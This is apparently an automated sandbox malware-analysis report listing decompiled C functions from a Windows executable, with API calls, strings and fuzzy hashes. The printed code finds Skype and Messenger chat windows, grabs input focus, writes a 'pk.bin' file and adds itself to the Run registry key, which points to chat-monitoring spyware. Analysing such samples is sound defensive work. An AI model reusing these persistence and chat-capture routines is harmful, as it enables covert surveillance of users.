    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #567$#324#384H_prolog
    • String ID: 0YD
    • API String ID: 394078367-3252838166
    • Opcode ID: dc23be869d9b8466c084cab707c5b2efd2b5d3938143922a1de2a968616e30a2
    • Instruction ID: 6f8cde3231a6a0ee0d25678e51072f5aee364cb030d00bdc28347bb88c39bc10
    • Opcode Fuzzy Hash: dc23be869d9b8466c084cab707c5b2efd2b5d3938143922a1de2a968616e30a2
    • Instruction Fuzzy Hash: 8011E770900744DEDB11EF75C8857DEFBE0AF55318F00846FE59657282CB781A08C7A5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409ED6(void* __ecx, struct HWND__* _a4, char* _a8) {
    				struct HWND__* _t14;
    				void* _t19;
    
    				_t19 = __ecx;
    				if(_a4 != 0) {
    					if(strncmp(_a8, "IMWindowClass", 0xd) != 0 || FindWindowExA(_a4, 0, "DirectUIHWND", 0) != 0) {
    						goto L1;
    					} else {
    						_t14 = FindWindowExA(_a4, 0,  *(_t19 + 4), 0);
    						if(_t14 == 0) {
    							goto L1;
    						}
    						return FindWindowExA(_a4, _t14,  *(_t19 + 4), 0) & 0xffffff00 | _t15 != 0x00000000;
    					}
    				}
    				L1:
    				return 0;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$strncmp
    • String ID: DirectUIHWND$IMWindowClass
    • API String ID: 3975895692-4179751236
    • Opcode ID: b34562ae25f393f4f4a756d588126caf2af67be14a25688c304ecf65b9baf811
    • Instruction ID: cfe08eb8aef9a55a4dcc8363e0b7a273b0818594b5256c27cb3c22d74076a4c5
    • Opcode Fuzzy Hash: b34562ae25f393f4f4a756d588126caf2af67be14a25688c304ecf65b9baf811
    • Instruction Fuzzy Hash: 48F0AF7220010ABFEF108E51DC81E67BB5CEB51799B118033F90896192DB369D51D6E4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0041F788(signed int __ecx) {
    				intOrPtr _v28;
    				intOrPtr _v48;
    				signed char* _v52;
    				char* _v68;
    				signed int _v76;
    				struct tagOFNA _v80;
    				void _v339;
    				signed char _v340;
    				int _t25;
    				signed int _t26;
    				signed int _t28;
    
    				_v340 = _v340 & 0x00000000;
    				_t26 = __ecx;
    				_t28 = 0x40;
    				memset( &_v339, 0, _t28 << 2);
    				asm("stosw");
    				asm("stosb");
    				memset( &_v80, 0, 0x4c);
    				_v80 = 0x4c;
    				if(_t26 != 0) {
    					_v76 =  *((intOrPtr*)(_t26 + 0x20));
    				} else {
    					_v76 = _v76 & _t26;
    				}
    				_v68 = "Program files (*.exe)";
    				_v52 =  &_v340;
    				_v48 = 0x104;
    				_v28 = 0x1804;
    				_t25 = GetOpenFileNameA( &_v80);
    				if(_t25 != 0) {
    					_push(_v52);
    					_push(0x42d);
    					L0043E066();
    					L0043E15C();
    					return _t25;
    				}
    				return _t25;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092#6199FileNameOpenmemset
    • String ID: L$tHE
    • API String ID: 448559069-429902498
    • Opcode ID: ab53499e445719148970241ad1b45d172f187cf0af91510b55aa365b685c1d12
    • Instruction ID: db4678e19c5d7651d08ff3f587fb0977872576650f95b19ea9f3db0acd2cba7b
    • Opcode Fuzzy Hash: ab53499e445719148970241ad1b45d172f187cf0af91510b55aa365b685c1d12
    • Instruction Fuzzy Hash: A80144B1E00208ABEF119FE5DC45BDD7BB4AB48708F10007AE614A62C1EBB8554D8B59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0040CC90(intOrPtr* __ecx) {
    				struct tagRECT _v20;
    				struct HWND__* _t11;
    				void* _t17;
    				struct tagRECT* _t23;
    				intOrPtr* _t25;
    
    				_t25 = __ecx;
    				_t23 = __ecx + 0xb4;
    				GetWindowRect( *(__ecx + 0x20), _t23);
    				_t11 = GetParent( *(_t25 + 0x20));
    				_push(_t11);
    				L0043DD9C();
    				if(_t11 != 0) {
    					_push(_t23);
    					L0043E02A();
    				}
    				GetClientRect( *(_t25 + 0x20),  &_v20);
    				L0043E1B0();
    				L0043E1AA();
    				 *((intOrPtr*)( *_t25 + 0xc8))(_t25,  *((intOrPtr*)(_t25 + 0x50)),  &_v20, 1, _t25, 0);
    				_t17 = 1;
    				return _t17;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Rect$#1088#2122#2864#6880ClientParentWindow
    • String ID:
    • API String ID: 528508948-0
    • Opcode ID: ec4e73319e61eebf21c502b96aae2b37e40210c7b2dbe564287054474a251a84
    • Instruction ID: 157085a9b3a93409adb47049d8d7d470a121d65b512c7c0bb7b6df7e73e1aff1
    • Opcode Fuzzy Hash: ec4e73319e61eebf21c502b96aae2b37e40210c7b2dbe564287054474a251a84
    • Instruction Fuzzy Hash: A9016232211210ABDB20ABB5DC09FAB77BDFFC9704F04092DF646E61A1DBB5A4019759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FDB8(struct HWND__* _a4, struct HWND__** _a8) {
    				struct HWND__* _t10;
    				void* _t11;
    				struct HWND__* _t15;
    				struct HWND__* _t19;
    				struct HWND__** _t20;
    
    				_t19 = _a4;
    				GetClassNameA(_t19, 0x455358, 0x64);
    				_t10 = GetParent(_t19);
    				_t20 = _a8;
    				if(_t10 == _t20[4] && strcmp(_t20[3], 0x455358) == 0 && IsWindowVisible(_t19) != 0) {
    					GetWindowRect(_t19, 0x455348);
    					_t15 =  *0x45534c; // 0x0
    					if(_t20[2] == 0) {
    						if(_t15 < _t20[1]) {
    							goto L7;
    						}
    					} else {
    						if(_t15 > _t20[1]) {
    							L7:
    							_t20[1] = _t15;
    							 *_t20 = _t19;
    						}
    					}
    				}
    				_t11 = 1;
    				return _t11;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$ClassNameParentRectVisiblestrcmp
    • String ID: XSE
    • API String ID: 2044700880-181280146
    • Opcode ID: 26800ccf7abb6be9b8ba418c830c3197e91a7cfd7bdcd88d619378267546e552
    • Instruction ID: 9d5605630afb518caf01d78ee7b21bd23e046c633ce2dfaafb79efa3c1692723
    • Opcode Fuzzy Hash: 26800ccf7abb6be9b8ba418c830c3197e91a7cfd7bdcd88d619378267546e552
    • Instruction Fuzzy Hash: AA01A2711007009FD3308BA1E888B3BB7E9EBD5712B10483FF545E6AE1D338A84997A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E0040B44B(void* __ecx) {
    				void* _t21;
    				signed int _t34;
    				void* _t36;
    
    				E0043E4E0(0x43fcb7, _t36);
    				 *(_t36 - 0x10) =  *(_t36 - 0x10) & 0x00000000;
    				_push( *((intOrPtr*)(_t36 + 0xc)));
    				_push(_t36 + 0xc);
    				_t21 = E0040FEA7();
    				_t34 = 1;
    				_push("Conversations - ");
    				 *(_t36 - 4) = _t34;
    				L0043DFD6();
    				if(_t21 <= 0) {
    					_push(_t36 + 0xc);
    					L0043DD3C();
    					 *(_t36 - 0x10) = _t34;
    				} else {
    					_push(_t21 + 0x10);
    					_push( *((intOrPtr*)(_t36 + 8)));
    					L0043DFB2();
    					 *(_t36 - 0x10) = _t34;
    				}
    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return  *((intOrPtr*)(_t36 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040B450
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #2764.MFC42(Conversations - ), ref: 0040B477
    • #4277.MFC42(?,-00000010,Conversations - ), ref: 0040B48A
    • #535.MFC42(?,Conversations - ), ref: 0040B49B
    • #800.MFC42(?,Conversations - ), ref: 0040B4AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #535#800H_prologMessageSend$#2764#4277#537#823#825Windowmemset
    • String ID: Conversations -
    • API String ID: 1799315098-1394769103
    • Opcode ID: 087e9431ef721fe3878205155414d1ef57084c9a90ecc5403451b4215890f594
    • Instruction ID: 42e8c25be250e4e65c8f60ddbabb83d61584712909ac3b03973304dc8dfe24a1
    • Opcode Fuzzy Hash: 087e9431ef721fe3878205155414d1ef57084c9a90ecc5403451b4215890f594
    • Instruction Fuzzy Hash: 36012C76900119ABDB14EF51D842BED7B68EF18368F00842AF8159A282DB7C9704CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0040A6F9() {
    				signed int _t13;
    				void* _t16;
    				signed int _t18;
    				void* _t25;
    
    				E0043E4E0(0x43faa8, _t25);
    				_t18 = 0;
    				if( *((intOrPtr*)(_t25 + 8)) == 0 || strncmp( *(_t25 + 0xc), "TskMultiChatForm.UnicodeClass", 0x1d) != 0) {
    					_t13 = 0;
    				} else {
    					_push( *((intOrPtr*)(_t25 + 8)));
    					_push(_t25 + 0xc);
    					_t16 = E0040FEA7();
    					_push("Skype");
    					 *(_t25 - 4) = 0;
    					L0043DFD6();
    					if(_t16 != 0xffffffff) {
    						_t18 = 1;
    					}
    					 *(_t25 - 4) =  *(_t25 - 4) | 0xffffffff;
    					L0043DD36();
    					_t13 = _t18;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
    				return _t13;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040A6FE
    • strncmp.MSVCRT(?,TskMultiChatForm.UnicodeClass,0000001D), ref: 0040A715
    • #2764.MFC42(Skype), ref: 0040A73F
    • #800.MFC42(Skype), ref: 0040A752
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2764#800H_prologstrncmp
    • String ID: Skype$TskMultiChatForm.UnicodeClass
    • API String ID: 2424781069-2311822767
    • Opcode ID: 698389e905a2032e3afd175398bd690fa8d566962fb51e4dbb53bcaab0c329f3
    • Instruction ID: 677b73739aae22f38c22365f8432a91294e62a684a10ee34ffab5759a66f3153
    • Opcode Fuzzy Hash: 698389e905a2032e3afd175398bd690fa8d566962fb51e4dbb53bcaab0c329f3
    • Instruction Fuzzy Hash: 3AF04435500204BBCB14AF60D882A9E7764EB15368F20D13BF826662D2D73DD619D719
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00422BD3(intOrPtr __ecx) {
    				void* __esi;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				void* _t24;
    				intOrPtr _t36;
    				void* _t38;
    
    				_t21 = E0043E4E0(0x442529, _t38);
    				_push(__ecx);
    				_t36 = __ecx;
    				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
    				 *(_t38 - 4) = 6;
    				L0043E39C();
    				 *(_t38 - 4) = 5;
    				L0043DF6A();
    				 *(_t38 - 4) = 4;
    				L0043E0A8();
    				 *(_t38 - 4) = 3;
    				L0043DF6A();
    				 *(_t38 - 4) = 2;
    				_t22 = L00404F36(_t21, __ecx + 0x118, __ecx);
    				 *(_t38 - 4) = 1;
    				_t23 = L00404F36(_t22, _t36 + 0xc4, _t36);
    				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
    				_t24 = L00404F36(_t23, _t36 + 0x70, _t36);
    				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
    				E0040E7E0();
    				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
    				return _t24;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #693$#686#804H_prolog
    • String ID: )%D
    • API String ID: 1106850422-1369436435
    • Opcode ID: 6e2cf092d2d279f3f04467956644d8d257bd2c6a336cdf64f3aff8223b06b626
    • Instruction ID: 5bf6bb07a23a0fe2670e0173fdae1fe97064251633f024512ce975b122652448
    • Opcode Fuzzy Hash: 6e2cf092d2d279f3f04467956644d8d257bd2c6a336cdf64f3aff8223b06b626
    • Instruction Fuzzy Hash: 9801D870801684DAE725E7B5C5557DDFBB0AF19308F10858EA457632C2CBB82B04C766
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428BC9() {
    				long _t9;
    				long _t10;
    				struct HWND__* _t14;
    
    				_t14 = 0;
    				_t10 = GetCurrentThreadId();
    				_t9 = GetWindowThreadProcessId(GetForegroundWindow(), 0);
    				if(_t9 == _t10) {
    					GetFocus();
    				} else {
    					AttachThreadInput(_t9, _t10, 1);
    					_t14 = GetFocus();
    					AttachThreadInput(_t9, _t10, 0);
    				}
    				return _t14;
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00428BCE
    • GetForegroundWindow.USER32(00000000,?,?,?,00428E19), ref: 00428BD7
    • GetWindowThreadProcessId.USER32(00000000), ref: 00428BDE
    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00428E19), ref: 00428BF5
    • GetFocus.USER32 ref: 00428BF7
    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00428E19), ref: 00428C03
    • GetFocus.USER32 ref: 00428C08
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Thread$AttachFocusInputWindow$CurrentForegroundProcess
    • String ID:
    • API String ID: 1429152252-0
    • Opcode ID: bdc0b0c855d5e61862d08f4c1f439ac1689239f6182ed8ee0a8ba48dc14d3771
    • Instruction ID: f501bea8363ea4d516894753362f7d4f47a15c5ef74427dcf7aec9a7fe4da11f
    • Opcode Fuzzy Hash: bdc0b0c855d5e61862d08f4c1f439ac1689239f6182ed8ee0a8ba48dc14d3771
    • Instruction Fuzzy Hash: 00E06DBA7526586BC6103BF66C4CF1B7B6CE7CB762B11003AF602C2211DEB658409B78
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A851(struct HWND__* _a4, char* _a8) {
    
    				if(_a4 != 0) {
    					if(strncmp(_a8, "Chat View", 9) != 0 || FindWindowExA(_a4, 0, "ChatTitle", 0) == 0) {
    						goto L1;
    					} else {
    						return FindWindowExA(_a4, 0, "Chat Link Bar", 0) & 0xffffff00 | _t10 != 0x00000000;
    					}
    				}
    				L1:
    				return 0;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$strncmp
    • String ID: Chat Link Bar$Chat View$ChatTitle
    • API String ID: 3975895692-2749659690
    • Opcode ID: 99daa3d35be05c2dbb68d3de3584be63f937ab6c4809a1e3edad9f9f02709684
    • Instruction ID: c2efc92d85586c4d5b20a4276b8e16a20d08bca1911b57061cc6151812dbdf08
    • Opcode Fuzzy Hash: 99daa3d35be05c2dbb68d3de3584be63f937ab6c4809a1e3edad9f9f02709684
    • Instruction Fuzzy Hash: F2E0A772541311B6C6116B228C05E0B7FA8DFE2B92B01843ABC00610A2D2388867D6A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A9B3(struct HWND__* _a4, char* _a8) {
    
    				if(_a4 != 0) {
    					if(strncmp(_a8, "#32770", 6) != 0 || FindWindowExA(_a4, 0, "MButtonClass", 0) == 0) {
    						goto L1;
    					} else {
    						return FindWindowExA(_a4, 0, "RichEdit20A", 0) & 0xffffff00 | _t10 != 0x00000000;
    					}
    				}
    				L1:
    				return 0;
    			}



    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$strncmp
    • String ID: #32770$MButtonClass$RichEdit20A
    • API String ID: 3975895692-4137904940
    • Opcode ID: 9016851bed157aeb0aaa87b34a296fcac30576b35f3bd8bba98a55d7420f8003
    • Instruction ID: cb2bf59678940543a2336d3559745b96064b7d308bbe1a9202bdccee997095dd
    • Opcode Fuzzy Hash: 9016851bed157aeb0aaa87b34a296fcac30576b35f3bd8bba98a55d7420f8003
    • Instruction Fuzzy Hash: EBE0EC71704301B6C7115F128D05F477E69DBD2BD1F02443AFC40611E2D238C86ADA69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00422CCA(void* __ecx) {
    				void* __esi;
    				void* _t15;
    				void* _t26;
    
    				_t15 = E0043E4E0(0x442558, _t26);
    				L0043E192();
    				_t29 =  *((intOrPtr*)(_t26 + 8));
    				if( *((intOrPtr*)(_t26 + 8)) != 0) {
    					 *(__ecx + 0x17dd) =  *(__ecx + 0x17dd) & 0x00000000;
    					_push("pk.bin");
    					_t16 = _t26 + 8;
    					_push(0x4558c8);
    					_push(_t26 + 8);
    					L0043DE20();
    					 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
    					_t15 = E0040BC5C(__ecx + 0x16b8, _t29,  *_t16);
    					 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
    					L0043DD36();
    					_t30 =  *((char*)(__ecx + 0x17dc));
    					if( *((char*)(__ecx + 0x17dc)) != 0) {
    						_t15 = E0042817C(__ecx, _t30, 0x4550cc,  *((intOrPtr*)(__ecx + 0x1a14)));
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
    				return _t15;
    			}






    APIs
    • __EH_prolog.LIBCMT ref: 00422CCF
    • #2379.MFC42 ref: 00422CD7
    • #924.MFC42(00000000,004558C8,pk.bin), ref: 00422CF7
      • Part of subcall function 0040BC5C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040BC82
    • #800.MFC42(00000000,004558C8,pk.bin), ref: 00422D14
      • Part of subcall function 0042817C: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042819B
      • Part of subcall function 0042817C: lstrcpyA.KERNEL32(?,?), ref: 004281AF
      • Part of subcall function 0042817C: lstrcatA.KERNEL32(?,004541C8), ref: 004281CF
      • Part of subcall function 0042817C: lstrcatA.KERNEL32(?,?), ref: 004281D9
      • Part of subcall function 0042817C: strrchr.MSVCRT ref: 004281ED
      • Part of subcall function 0042817C: RegCreateKeyA.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428210
      • Part of subcall function 0042817C: lstrlenA.KERNEL32(?), ref: 0042821D
      • Part of subcall function 0042817C: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00428236
      • Part of subcall function 0042817C: RegCloseKey.ADVAPI32(?), ref: 0042823F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CreateFilelstrcat$#2379#800#924CloseH_prologModuleNameValuelstrcpylstrlenstrrchr
    • String ID: X%D$pk.bin
    • API String ID: 965265263-3879839953
    • Opcode ID: 2c98776a39eca5e1f208e1ddad5c1be96afb28e522347b7f0caeee4f5b0517e4
    • Instruction ID: 5c98c6a0e8a1ab7bd0c1ef8652de08ce64479763ce929b8e68fc415fc9871944
    • Opcode Fuzzy Hash: 2c98776a39eca5e1f208e1ddad5c1be96afb28e522347b7f0caeee4f5b0517e4
    • Instruction Fuzzy Hash: 37F04631506710BADB29EB65E4067CEBBB0DF09318F50881FB015560D1CBBC6588CB4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A106(struct HWND__* _a4, char* _a8) {
    
    				if(_a4 != 0) {
    					if(strncmp(_a8, "IMWindowClass", 0xd) == 0 || strncmp(_a8, "PageWindowClass", 0xd) == 0) {
    						return FindWindowExA(_a4, 0, "DirectUIHWND", 0) & 0xffffff00 | _t8 != 0x00000000;
    					} else {
    						goto L1;
    					}
    				}
    				L1:
    				return 0;
    			}



    APIs
    • strncmp.MSVCRT(?,IMWindowClass,0000000D), ref: 0040A123
    • strncmp.MSVCRT(?,PageWindowClass,0000000D), ref: 0040A137
    • FindWindowExA.USER32 ref: 0040A14D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: strncmp$FindWindow
    • String ID: DirectUIHWND$IMWindowClass$PageWindowClass
    • API String ID: 3956805227-2290508562
    • Opcode ID: 81cead9e737d4d8aa051ba9c657d8d9cc6858aa714670e4b1493a57e648b913c
    • Instruction ID: 55062af96aa20b879a9a34928b64882c37cb08a6226f325d26903f5f5e579126
    • Opcode Fuzzy Hash: 81cead9e737d4d8aa051ba9c657d8d9cc6858aa714670e4b1493a57e648b913c
    • Instruction Fuzzy Hash: 60E0E530280311B3E6218F20AD03F4B73805F51B03F110437BD40751D1E2799D28A66F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0041A04C(void* __ecx) {
    				void* __esi;
    				void* _t8;
    				struct HWND__* _t11;
    				long _t12;
    				void* _t18;
    				void* _t20;
    				intOrPtr _t22;
    
    				_t8 = E0043E4E0(0x4412f0, _t20);
    				_push(__ecx);
    				_t18 = __ecx;
    				_push(__ecx);
    				 *((intOrPtr*)(_t20 - 0x10)) = _t22;
    				_push("options_title.htm");
    				L0043DE26();
    				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
    				L004044C9(_t8, _t22, __ecx);
    				E00422E3C();
    				_t11 = GetParent( *(_t18 + 0x20));
    				_push(_t11);
    				L0043DD9C();
    				_t12 = SendMessageA( *(_t11 + 0x20), 0x53, 0, 0);
    				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
    				return _t12;
    			}










    APIs
    • __EH_prolog.LIBCMT ref: 0041A051
    • #537.MFC42(options_title.htm,?,?,?,0041A046), ref: 0041A065
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    • GetParent.USER32(?), ref: 0041A07D
    • #2864.MFC42(00000000,?,?,?,0041A046), ref: 0041A084
    • SendMessageA.USER32(?,00000053,00000000,00000000), ref: 0041A092
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#2864#924DesktopMessageParentSendWindow
    • String ID: options_title.htm
    • API String ID: 1701201414-3760961916
    • Opcode ID: 1c34da9d795b849c3d96e9a41e03bad92471dcf3ab88354f1fc759181fa90849
    • Instruction ID: 62607f949bef3c38a102216fa6dddf96d4c28192d0749a8f70c8b7ba80dfaedf
    • Opcode Fuzzy Hash: 1c34da9d795b849c3d96e9a41e03bad92471dcf3ab88354f1fc759181fa90849
    • Instruction Fuzzy Hash: F9F0E5B1A10200BBCB143BB5EC07B6E7B74FB89718F00476FB122B61E2CBB859005A1C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E0040EC3F(void* __eax, void* __ecx) {
    
    				_push(0x421);
    				L0043DFA6();
    				_push(__eax);
    				_push(0x479);
    				L0043E066();
    				L0043E07E();
    				_push(__eax);
    				_push(0x3e8);
    				L0043E066();
    				L0043E07E();
    				_push(__eax);
    				_push(0x3e9);
    				L0043E066();
    				L0043E07E();
    				return __eax;
    			}



    APIs
    • #4055.MFC42(00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080), ref: 0040EC48
    • #3092.MFC42(00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF), ref: 0040EC57
    • #2642.MFC42(00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF), ref: 0040EC5E
    • #3092.MFC42(000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?), ref: 0040EC6B
    • #2642.MFC42(000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?,00000421,?), ref: 0040EC72
    • #3092.MFC42(000003E9,00000000,000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?), ref: 0040EC7F
    • #2642.MFC42(000003E9,00000000,000003E8,00000000,00000479,00000000,00000421,?,?,0040EC34,0000048F,?,0000048E,?,0000048D,?), ref: 0040EC86
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2642#3092$#4055
    • String ID:
    • API String ID: 2023933615-0
    • Opcode ID: 4cc7e614508e5a90b9d3356f2a59a892ba123c0ed536a0695441edaf4867cb30
    • Instruction ID: 3957810a96fb800fa570e150547e83f9b838ce8289a0f2f271505939ccb6f5d9
    • Opcode Fuzzy Hash: 4cc7e614508e5a90b9d3356f2a59a892ba123c0ed536a0695441edaf4867cb30
    • Instruction Fuzzy Hash: D7E0BF1174227467A93D32B7691BE1E046ACBC9F14F00141F71059B2C2ECDC4D024269
    Uniqueness

    Uniqueness Score: -1.00%

